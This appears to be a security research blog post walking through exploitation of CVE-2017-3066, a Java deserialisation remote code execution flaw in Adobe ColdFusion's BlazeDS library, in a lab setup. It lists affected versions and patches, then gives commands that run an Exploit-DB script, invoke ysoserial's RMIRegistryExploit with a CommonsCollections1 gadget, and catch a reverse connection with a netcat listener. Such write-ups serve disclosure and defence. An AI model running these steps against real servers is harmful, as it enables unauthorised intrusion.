CVE-2017-3066 : Adobe Coldfusion BlazeDS Java Object Deserialisation RCE | Lucideus Research

                                                                                                               [Difficulty Level: Medium, CVSS v3 Base Score: 9.8 ]

Introduction
Adobe Coldfusion, a commercial Rapid Web Technology Application Development Platform created by Adobe is affected to a Java Deserialisation Flaw in its Apache BlazeDS Library when it handles untrusted Java Objects which further gives Attacker the permission to attack remotely as a Remote Code Execution Vulnerability.

Adobe Coldfusion
Adobe ColdFusion is a commercial rapid web application development platform created by JJ Allaire in 1995. (The programming language used with that platform is also commonly called ColdFusion, though is more accurately known as CFML.) ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it became a full platform that included an IDE in addition to a full scripting language.


Affected Platforms
  • Adobe ColdFusion 2016 Update 3 and earlier
  • Adobe ColdFusion 11 update 11 and earlier 
  • ColdFusion 10 Update 22 and earlier
Lab Environment
  • Victim’s Machine : Windows 7x64, Adobe ColdFusion 2016 Update 2 Trial Version
  • Attacker’s Machine : Kali 17.3, JRMP Listener[4], Netcat

Security Patches : Upgrade to Adobe ColdFusion version 10 update 23 / 11 update 12 / 2016 update 4 or later. https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html

Proof of Concept Running Adobe Coldfusion 2016 Trial on Windows 7 Ultimate on Port Number 4444 and checking the IP of the VIctim’s Machine. cmd > ipconfig



  • Checking the IP configuration of Attacker's Machine $ terminal > ifconfig
  • Download the Python exploit from Exploit-DB and save on Desktop of attacker's machine.
  • Cloning the JRMP Listener from github with saving and extracting it to the Desktop of the Kali Machine.
$ git clone https://github.com/frohoff/ysoserial
  • Enabling the RCE on Adobe ColdFusion by deploying the steps one by one.
$ python 43993.py [Victim’s IP] [Port used by Adobe Coldfusion] [Attacker’s IP] [Port to Listen]
(The Script is enabling Remote Code Execution on ColdFusion’s Java Deserialisation Flaw in its Apache BlazeDS Library) $java -cp [Path of JRMP Listener jar file] ysoserial.exploit.RMIRegistryExploit [Victim’s IP] [Port Number] CommonsCollections1 [execuable file for the payload]. $nc -lvp 4444 (Listening on Port Number 4444 through Netcat)

Getting access through JRMP Listener with the help of Netcat.
References https://nvd.nist.gov/vuln/detail/CVE-2017-3066 https://en.wikipedia.org/wiki/Adobe_ColdFusion https://www.adobe.com/products/coldfusion-family.html https://github.com/frohoff/ysoserial https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html

No comments:

Powered by Blogger.